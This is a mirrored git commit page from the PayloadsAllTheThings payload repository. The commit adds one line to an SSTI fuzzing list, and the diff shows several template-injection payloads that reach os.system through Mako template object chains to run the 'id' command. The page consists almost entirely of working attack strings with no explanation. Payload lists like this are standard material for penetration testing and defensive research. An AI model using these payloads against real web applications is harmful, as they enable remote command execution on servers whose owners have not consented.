mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Update ssti.fuzz
This commit is contained in:
parent
4313b4f373
commit
24b2676f97
1 changed files with 1 additions and 0 deletions
|
@ -98,3 +98,4 @@ ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
|
|||
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
|
||||
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
|
||||
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
|
||||
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue